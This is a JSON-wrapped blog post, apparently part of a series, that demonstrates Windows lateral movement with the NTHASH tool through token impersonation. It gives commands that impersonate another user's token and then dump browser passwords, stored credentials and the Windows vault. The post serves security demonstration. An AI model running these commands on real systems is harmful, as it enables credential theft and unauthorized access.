{"id":2206,"date":"2019-10-29T21:59:29","date_gmt":"2019-10-29T20:59:29","guid":{"rendered":"http:\/\/labalec.fr\/erwan\/?p=2206"},"modified":"2019-10-30T12:53:30","modified_gmt":"2019-10-30T11:53:30","slug":"demonstrating-lateral-movement-with-nthash-part-7","status":"publish","type":"post","link":"https:\/\/labalec.fr\/erwan\/?p=2206","title":{"rendered":"Demonstrating lateral movement with NTHASH Part #7"},"content":{"rendered":"<p>In previous <a href=\"https:\/\/labalec.fr\/erwan\/?p=2193\" rel=\"noopener\" target=\"_blank\">articles<\/a>, we have used Pass The Hash to perform lateral movement.<br \/>\nThis time, let's drop PTH and use token impersonation.<\/p>\n<p>Indeed, if you are lucky enough to be a local admin, you can impersonate a token owned by another user currently logged on to the same system as you (it could be a terminal server).<br \/>\nThat other user may happen to be an admin on systems where you currently don't have access (yet).<br \/>\nImpersonating this user will let you perform lateral movement.<\/p>\n<p>This is as simple as running <strong>NTHASH-win64.exe \/runastoken \/pid:xxx<\/strong>, where pid is the ID of a process owned by that other user.<\/p>\n<p>Just keep in mind that you need to be running an elevated shell to do so.<br \/>\nIf not done yet, simply run <strong>NTHASH-win64.exe \/runas<\/strong> before running the command above.<\/p>\n<p>As simple as that: again, no need to know the user's password (nor the hash this time).<\/p>\n<p>Once running in the context of this other user, you can then run commands like:<br \/>\nNTHASH-win64.exe \/chrome<br \/>\nNTHASH-win64.exe \/firefox<br \/>\nNTHASH-win64.exe \/enumcred<br \/>\nNTHASH-win64.exe \/enumcred2<br \/>\nNTHASH-win64.exe \/enumvault<br \/>\n&#8230;<\/p>\n<p>And keep moving laterally&#8230; or up&#8230;<\/p>\n","protected":false},"excerpt":{"rendered":"<p>In previous articles, we have used Pass The Hash to perform lateral movement. This time, let's drop PTH and use token impersonation. 
Indeed, if you are lucky enough to be a local admin, you can impersonate a token owned by another user currently logged on to the same system as you (it could be a terminal <a href='https:\/\/labalec.fr\/erwan\/?p=2206' class='excerpt-more'>[&#8230;]<\/a><\/p>\n","protected":false},"author":7,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[118],"tags":[],"class_list":["post-2206","post","type-post","status-publish","format-standard","hentry","category-nthash","category-118-id","post-seq-1","post-parity-odd","meta-position-corners","fix"],"_links":{"self":[{"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=\/wp\/v2\/posts\/2206","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2206"}],"version-history":[{"count":3,"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=\/wp\/v2\/posts\/2206\/revisions"}],"predecessor-version":[{"id":2209,"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=\/wp\/v2\/posts\/2206\/revisions\/2209"}],"wp:attachment":[{"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2206"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2206"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/labalec.fr\/erwan\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2206"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}